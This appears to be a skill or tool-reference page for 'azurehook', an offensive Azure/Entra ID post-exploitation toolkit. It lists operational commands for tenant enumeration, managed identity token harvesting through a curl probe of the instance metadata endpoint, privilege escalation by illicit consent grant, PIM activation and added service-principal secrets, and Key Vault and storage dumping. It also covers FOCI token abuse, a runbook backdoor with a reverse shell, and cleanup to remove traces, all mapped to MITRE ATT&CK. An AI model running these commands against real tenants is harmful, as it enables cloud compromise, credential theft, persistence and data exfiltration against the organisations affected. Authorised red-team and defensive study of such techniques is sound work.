azure-postexploit
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
| Field | Value |
|---|---|
| name | azure-postexploit |
| description | Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation |
| category | post-exploitation |
| tags | ["azure","entra-id","cloud","post-exploitation","keyvault","managed-identity","credential-access","persistence","token-abuse"] |
| tech_stack | ["azure","python","msal","msgraph","requests"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-284"] |
| chains_with | ["T1078.004","T1552.001","T1098.001","T1550.001","T1528"] |
| prerequisites | ["T1078.004"] |
| version | 1.0 |
Azure post-exploitation uses Microsoft Graph API, Azure Resource Manager API, and direct IMDS access for tenant enumeration, privilege escalation, secret extraction, and persistence. After compromising Azure credentials or a managed identity, these tools provide comprehensive Entra ID and Azure resource exploitation capabilities.
Install the Python dependencies:

```bash
pip3 install requests msal azure-identity azure-keyvault-secrets azure-storage-blob
```

Verify access with `az account show` or the Graph API `/me` endpoint.

```bash
# Quick prerequisite check
az account show                             # verify Azure CLI credentials
python3 -c "import requests; print('OK')"   # verify the requests module is importable
# Probe IMDS: -f treats non-2xx responses as failure, --max-time avoids hanging on a non-Azure host
curl -sf --max-time 3 -H "Metadata:true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01" 2>/dev/null \
  && echo "IMDS available"
```
| Action | Command | Purpose |
|---|---|---|
| Entra ID enum | azurehook entra_enum | Enumerate users, groups, apps, SPs, conditional access |
| Managed identity | azurehook managed_identity | Extract managed identity tokens from VM/App Service |

| Action | Command | Purpose |
|---|---|---|
| Consent grant | azurehook entra_privesc --method consent_grant | Illicit consent grant for Directory.ReadWrite.All |
| PIM activation | azurehook entra_privesc --method pim_activate | Activate eligible Global Administrator role |
| SP secret | azurehook entra_privesc --method sp_secret | Add client secret to existing service principal |

| Action | Command | Purpose |
|---|---|---|
| Key Vault dump | azurehook keyvault_dump | Extract secrets, keys, certificates from Key Vaults |
| Storage dump | azurehook storage_dump | Download sensitive data from Blob Storage |
| Token abuse | azurehook azuread_token --action foci | Use FOCI to get tokens for multiple services |

| Action | Command | Purpose |
|---|---|---|
| Runbook backdoor | azurehook runbook_backdoor --automation-account NAME --resource-group RG | Create Automation runbook with reverse shell |

Cleanup: `azurehook cleanup_azure`
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| entra_enum | Entra ID tenant enumeration | T1087.004 — Cloud Account |
| entra_privesc | Privilege escalation via consent/PIM/SP | T1098.001 — Additional Cloud Credentials |
| keyvault_dump | Key Vault secret extraction | T1555.006 — Cloud Secrets Management Stores |
| storage_dump | Azure Storage data exfiltration | T1530 — Data from Cloud Storage |
| managed_identity | Managed identity token harvest | T1552.005 — Cloud Instance Metadata API |
| runbook_backdoor | Automation Account persistence | T1525 — Implant Internal Image |
| azuread_token | Token manipulation and FOCI abuse | T1550.001 — Application Access Token |
| cleanup_azure | Resource removal and restoration | T1070 — Indicator Removal |